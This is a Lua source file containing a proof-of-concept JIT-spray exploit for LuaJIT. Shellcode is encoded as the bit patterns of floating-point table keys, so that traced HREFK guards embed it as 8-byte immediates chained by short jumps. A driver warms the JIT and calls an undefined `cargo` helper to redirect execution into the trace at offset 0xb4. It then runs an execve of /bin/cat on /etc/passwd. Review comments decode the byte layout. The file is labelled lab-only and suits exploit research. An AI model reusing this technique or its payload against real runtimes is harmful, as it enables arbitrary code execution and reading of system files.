--[[
This JIT-shellcoding technique leverages immediate values in
assembly instructions to hide a shellcode within the JIT'ed trace.
It is possible thanks to the 'Guarded Assertions' the JIT compiler
emits when assembling the `HREFK` IR instruction / performing hash-key
specialization: each constant table key is compared against an
8-byte immediate embedded in the generated machine code.
The shellcode is split into tiny 8-byte stubs, with a `jmp`
instruction at the end of each stub to chain them together.
The `pewpew()` function points to a shellcode that executes
`execve()` with your own argv[0] and argv[1].
Lab-only proof of concept: it depends on a specific LuaJIT build,
architecture and code layout, and on the trace memory being executable.
]]--
--- JIT-spray target: a function whose compiled trace carries the shellcode.
-- Every `t[<double>]=0` store uses a constant, non-integer key; per the header
-- comment, once this function is traced each such store becomes an `HREFK`
-- IR node whose guard compares the hash slot's key against that constant, so
-- the key's 8-byte IEEE-754 bit pattern ends up as an immediate in the
-- generated machine code. Read as bytes, those immediates are the stubs.
-- The literals ARE the payload: do not reorder, reformat, round, or fold them
-- into a loop or list. Any such change alters the emitted immediates or the
-- IR shape and breaks the trace layout the driver relies on.
-- @param t table receiving the stores (the driver passes a fresh `{}`)
-- @param s unused in the body; the driver passes '/bin/cat' here.
--   Presumably picked up by the shellcode from the call frame/registers --
--   TODO confirm against the stub disassembly.
-- @param a unused in the body; the driver passes '/etc/passwd' -- same caveat.
function pewpew(t, s, a)
-- NOTE(review): the six keys below are subnormal doubles (k * 2^-1074, k=1..6),
-- i.e. bit patterns 0x1..0x6, mostly zero bytes. They look like padding or
-- hash-part sizing rather than executed code -- verify with the trace dump.
t[5e-324]=0
t[1e-323]=0
t[1.5e-323]=0
t[2e-323]=0
t[2.5e-323]=0
t[3e-323]=0
-- NOTE(review): the remaining keys all lie in [1.849e-193, 1.915e-193]. Their
-- sign/exponent/top-mantissa bits decode to 0x17EB, so in little-endian memory
-- each 8-byte immediate appears to end in `EB 17` -- a short `jmp +0x17` --
-- leaving 6 payload bytes per stub, which matches the header's description of
-- stubs chained by a `jmp`. Confirm by disassembling the trace mcode.
t[1.9055771651032652e-193]=0
t[1.8559668824708362e-193]=0
t[1.8494619877878633e-193]=0
t[1.8517288554178477e-193]=0
t[1.914498447205438e-193]=0
t[1.8639327969763123e-193]=0
t[1.8538274887895865e-193]=0
t[1.8516839145637716e-193]=0
t[1.8567088159676176e-193]=0
t[1.8538243533811626e-193]=0
t[1.849450512851345e-193]=0
t[1.8716972807551464e-193]=0
t[1.872875119460234e-193]=0
t[1.8745776759605808e-193]=0
t[1.8493391391782406e-193]=0
t[1.8506931797233557e-193]=0
end
-- Driver: warm the JIT so `pewpew` gets traced, redirect into the trace, fire.
local tbl={}
-- Warm-up calls with nil args. The technique in the header comment needs the
-- function to be compiled so the constant keys become HREFK guards with the
-- payload as immediates. NOTE(review): whether two calls suffice depends on the
-- target build's hot-count settings (or on what `cargo` does) -- confirm.
pewpew(tbl,nil, nil)
pewpew(tbl,nil, nil)
-- `cargo` is not defined anywhere in this file. Presumably a companion
-- primitive (patched interpreter, FFI helper or module) that makes `pewpew`
-- enter the trace's machine code at offset 0xb4, i.e. at the first stub.
-- TODO confirm the contract of `cargo` and that 0xb4 matches this build's
-- trace prologue length; the offset is layout-specific.
cargo(pewpew,0xb4)
-- Final call: these strings become argv[0] and argv[1] of the execve()
-- described in the header comment. Benign demo payload -- run only in a lab.
pewpew(tbl, '/bin/cat', '/etc/passwd')